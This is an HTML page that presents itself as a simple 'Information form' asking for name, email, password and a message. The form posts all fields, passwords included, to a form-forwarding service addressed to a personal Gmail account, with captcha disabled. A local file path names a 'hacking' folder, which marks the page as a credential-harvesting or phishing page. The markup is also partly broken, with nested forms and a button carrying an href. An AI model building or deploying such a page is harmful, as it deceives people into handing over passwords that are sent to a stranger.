<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Information form</title>
    <style>
        .container{
            width: 250px;
            margin: 50px auto;
            display: flex;
            flex-direction: column;
            gap: 10px;
            background-color: bisque;
            border: 3px solid rgb(245, 222, 129);
            border-radius: 5px;
        }
        .form{
            display: flex;
            justify-content: center;
            align-items: center;
            padding: 5px;
        }
        div{
            align-items: center;
            justify-content: center;
            display: flex;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="form">
            <form action="https://formsubmit.co/sidsharma151947@gmail.com" method="POST">
            <form id="infoform">
                <div>Info form</div>
                <hr>
                <label for="name">Name</label>
                <br>
                <input type="text" placeholder="Your Name" name="name" required>
                <br>
                <label for="email">Email</label>
                <br>
                <input type="email" placeholder="Your Email" name="email" required>
                <br>
                <label for="pass">Password</label>
                <br>
                <input type="password" name="password" required>
                <br>
                <label for="msg">Message</label>
                <br>
                <textarea placeholder="Your Message" name="message" required></textarea>
                <br>
                <input type="hidden" name="_captcha" value="false">
                <button type="submit" href="C:\Users\Lenovo\project.html\hacking\second.html">Send Info</button>
            </form>
        </div>
    </div>
    <script>
        const form= document.getElementById("infoform");
        form.addEventListener("submit",function(e){
            e.preventDefault();
            const formData = new FormData(form);
            const data = {
                name:formData.get('name'),
                email: formData.get('email'),
                password : formData.get('password'),
                message : formData.get('message')
            };
            console.log("user info:",data);
            window.location.href = "second.html";
        });
    </script>
</body>
</html>
